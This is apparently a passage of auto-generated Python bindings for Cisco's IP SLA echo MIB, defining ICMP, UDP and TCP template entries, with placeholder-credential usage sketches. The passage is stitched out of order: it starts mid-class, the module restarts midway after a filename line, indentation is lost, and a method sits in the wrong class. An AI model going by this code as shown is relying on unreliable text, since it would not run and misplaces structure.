super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
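# --- Illustrative sketch (not part of the generated bindings) ----------------
# The distribution-bucket example from the cipslaTcpConnTmplDistInterval
# description, expressed as leaf assignments: 5 buckets of 10 ms each give
# 0-9, 10-19, 20-29, 30-39 and 40-Inf ms bins. Values are hypothetical.
#
#   tcp_tmpl = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry()
#   tcp_tmpl.cipslatcpconntmplname = 'TCP-CONN-TPL-1'   # key leaf
#   tcp_tmpl.cipslatcpconntmpldistbuckets = 5           # number of statistical bins
#   tcp_tmpl.cipslatcpconntmpldistinterval = 10         # bin width in milliseconds
# ------------------------------------------------------------------------------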
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
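# --- Illustrative usage sketch (not part of the generated bindings) ----------
# A minimal end-to-end example of pushing an ICMP echo template with the YDK
# CRUD service. The device address and credentials are placeholders, and
# whether a given platform accepts configuration of this MIB-derived model
# over NETCONF is platform-dependent; treat this as a sketch only.
if __name__ == '__main__':
    from ydk.services import CRUDService
    from ydk.providers import NetconfServiceProvider

    provider = NetconfServiceProvider(address='10.0.0.1',      # placeholder device
                                      username='admin',
                                      password='admin',
                                      port=830)
    crud = CRUDService()

    echo_mib = CISCOIPSLAECHOMIB()
    tmpl = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry()
    tmpl.cipslaicmpechotmplname = 'ICMP-ECHO-TPL-1'             # key leaf
    tmpl.cipslaicmpechotmpltimeout = 5000                       # milliseconds
    echo_mib.cipslaicmpechotmpltable.cipslaicmpechotmplentry.append(tmpl)

    crud.create(provider, echo_mib)                             # push the template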
| <filename>cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending a UDP echo request message to the
destination and receiving a UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides a description for the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For a regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
